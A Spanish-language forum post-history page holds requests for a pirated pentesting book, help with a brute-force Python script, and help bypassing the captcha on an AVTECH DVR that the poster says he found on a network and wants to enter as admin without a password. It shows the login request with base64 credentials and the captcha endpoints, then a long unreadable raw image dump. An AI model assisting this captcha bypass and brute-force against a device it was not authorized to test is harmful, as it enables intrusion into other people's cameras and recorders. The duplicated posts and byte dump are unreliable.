hola me podrian regalar por mp el libro de ox0000 python para pents.. por favor de ante mano muchas gracias
o si saben el link de desccarga porfa me lo pasan por mp please..
o si saben el link de desccarga porfa me lo pasan por mp please..
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Páginas1
#1
Dudas y pedidos generales / [SOLUCIONADO] me podrian regalar el pdf de oxw python para pentester
Marzo 30, 2018, 01:53:44 PM #2
Dudas y pedidos generales / [SOLUCIONADO] Duda sobre python y def
Marzo 19, 2018, 06:43:55 PM
amigo me pueden ayudar con lo siguiente:
estoy realizando un script de fuerza bruta en python pero cuando utilizo un wile con un def me arroja en resultado repetido
FV41
1
JwUw
2
JwUw
3
JwUw
4
HRNG
5
yeow
6
yeow
7
QWIU
8
QWIU
9
QWIU
10
QWIU
11
ese ees el resultado repetido 3 o 4 o 5 veces luego cambia como hago para limpiar la variable para que salga consecutivamente? gracias de ante mano
estoy realizando un script de fuerza bruta en python pero cuando utilizo un wile con un def me arroja en resultado repetido
FV41
1
JwUw
2
JwUw
3
JwUw
4
HRNG
5
yeow
6
yeow
7
QWIU
8
QWIU
9
QWIU
10
QWIU
11
ese ees el resultado repetido 3 o 4 o 5 veces luego cambia como hago para limpiar la variable para que salga consecutivamente? gracias de ante mano
#3
Dudas y pedidos generales / [SOLUCIONADO] Ayuda con python y un captcha cgi-bin
Marzo 07, 2018, 08:34:33 PM
hola amigos hoy tengo la posibilidad de preguntar lo siguiente.
eh encontrado un dvr avtch en una red y quiero entrar a el por la http: no tengo pass pero el user es admin.
lo que pasa es que quiero hacer fuerza bruta pero tiene un captcha, no tiene limites de intento y estoy ralizando un script en python
con libreria request pil y pytesserect pero eque es lo que pasa el captcha es cgi-bin
este es el get de la pagina /cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=86LC&verify_code=1520349816l-1l HTTP/1.1
explico rapidamente.. el mismo necesita de las cookies el usuer y la pass esta codificado base64 y la imagen se inserta automaticamente con una funcion de jquery
esta es la info del html en la imagen
<img src="/cgi-bin/nobody/Captcha.cgi?action=get&image=login_bmp" id="Captcha" alt="" class="codeBorder" width="132" height="29" border="1">
el src sale de el jquery.
function getCaptchaImg(){
document.getElementById("Captcha").src = "/cgi-bin/nobody/Captcha.cgi?action=get&image=login_bmp";
}
ok cuando realizo una peticion con requests en python el src donde se encuentra la imagen esta vacia NO tiene nada entonces
lo que realice fue hacer un requests directo al captcha el link de la imagen pero al momento de devolver el valor la imagen viene en blanco.
en blanco es en blanco y la salida que obtengo es esta es como si la imagen vine encriptada no se y no puedo capturarlo
pero en otros captcha si puedo esta es lasalida de la imagen en txt
Código: text
si me pueden ayudar a capturar la imagen por favor por que es como si estuviera escondida y no la atrapa.
eh encontrado un dvr avtch en una red y quiero entrar a el por la http: no tengo pass pero el user es admin.
lo que pasa es que quiero hacer fuerza bruta pero tiene un captcha, no tiene limites de intento y estoy ralizando un script en python
con libreria request pil y pytesserect pero eque es lo que pasa el captcha es cgi-bin
este es el get de la pagina /cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=86LC&verify_code=1520349816l-1l HTTP/1.1
explico rapidamente.. el mismo necesita de las cookies el usuer y la pass esta codificado base64 y la imagen se inserta automaticamente con una funcion de jquery
esta es la info del html en la imagen
<img src="/cgi-bin/nobody/Captcha.cgi?action=get&image=login_bmp" id="Captcha" alt="" class="codeBorder" width="132" height="29" border="1">
el src sale de el jquery.
function getCaptchaImg(){
document.getElementById("Captcha").src = "/cgi-bin/nobody/Captcha.cgi?action=get&image=login_bmp";
}
ok cuando realizo una peticion con requests en python el src donde se encuentra la imagen esta vacia NO tiene nada entonces
lo que realice fue hacer un requests directo al captcha el link de la imagen pero al momento de devolver el valor la imagen viene en blanco.
en blanco es en blanco y la salida que obtengo es esta es como si la imagen vine encriptada no se y no puedo capturarlo
pero en otros captcha si puedo esta es lasalida de la imagen en txt
BM- 6 ( ,,
Ü, Ä Ä ( ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿ ÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ€ € € € € € € € € ÿÿÿÿÿÿÿÿÿÿÿÿ€ € € € € € ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿ ÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿ€ € € € € € € € € ÿÿÿÿÿÿÿÿÿÿÿÿ€ € € € € € ÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿ ÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿFisFisFisFisFisFisFisFisFisFisFisFisFisFis€ € € FisFisFisÿÿÿ ÿ ÿÿÿÿÿÿ€ € € € ÿÿÿÿ ÿÿÿÿÿÿÿ ÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿ ÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿ ÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿ€ € € ÿÿÿÿÿÿÿÿÿFisFisFis€ € € € FisFisFisFisFisFisFisFisFisFisFisFisFisÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿ ÿÿ ÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿ ÿÿ ÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿ€ € € ÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿ€ € € € € ÿÿÿÿÿÿ ÿ ÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿFisFisFisFisFisFis ÿ ÿ ÿ ÿ Fis ÿ ÿ ÿ ÿ FisFisFisFisFisÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿ ÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿ€ € € € € € € € € € € € ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿFisFisFisFisFisFisFisFisFisFisFisFisFisFis ÿ ÿ ÿFisFisFisÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ€ € € € € € € € € € ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿFisFisFis ÿ ÿ ÿ ÿFisFisFisFisFisFisFisFisFisFisFisFisFisÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿ ÿÿÿÿ€ € € € € € € € € € € € € ÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿFisFisFisFisFisFisFisFisFis ÿ ÿ ÿ ÿ FisFisFisFisFisFisFisÿÿÿÿ ÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ€ € € ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ€ € € € ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿ ÿ ÿÿ ÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿFisFisFisFisFisFisFisFisFisFisFisFisÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ€ € € ÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿ€ € € € ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿFisFisFisFisFisFisFisFisFisFisFisFisFisFis€ € € FisFisFisÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ€ € € ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿ ÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿ€ € € ÿÿÿÿÿÿÿÿÿFisFisFisFis€ € € € FisFisFisFisFisFisFisFisFisFisFisFisÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ€ € € € ÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿ€ € € € € € ÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿFisFis ÿ ÿ ÿ ÿ ÿ ÿ ÿ FisFisFis ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿ ÿ€ € € € € € € € € € € € € € € € ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿ ÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ FisFisFisFisFisFisFisFisFisFisFisFisFisFisFisFisFisFisFisFisÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿ ÿÿÿÿÿÿ€ € € € € € € € € € € € € € € ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿFisFis ÿ ÿ ÿ ÿ ÿFisFisFisFisFisFisFisFisFisFisFisFisFisÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿ€ € € € € € € € € € € € € ÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿFisFisFisFisFisFisFis ÿ ÿ ÿ ÿ ÿ ÿ 